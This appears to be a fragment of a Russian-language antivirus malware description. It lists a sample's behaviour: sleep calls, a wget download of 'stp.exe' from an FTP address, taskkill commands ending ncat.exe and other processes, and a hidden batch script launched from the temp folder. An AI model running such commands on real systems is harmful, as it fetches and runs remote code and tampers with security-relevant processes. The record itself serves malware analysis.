Техническая информация
- <Текущая директория>\Sleep.exe 60
- <Текущая директория>\Sleep.exe 3
- <Текущая директория>\wget.exe ftp://19#.#68.1.2:12/stp.exe
- <SYSTEM32>\taskkill.exe -f -im nchive.exe
- <SYSTEM32>\taskkill.exe -f -im ncat.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Survivor.bat""
- <SYSTEM32>\taskkill.exe -f -im update.bat
- <Текущая директория>\Sleep.exe
- <SYSTEM32>\sleep.exe
- <SYSTEM32>\wget.exe
- %TEMP%\1.tmp\Survivor.bat
- <Текущая директория>\Update.bat
- <Текущая директория>\wget.exe
- '<IP-адрес в локальной сети>':12
- ClassName: '' WindowName: ''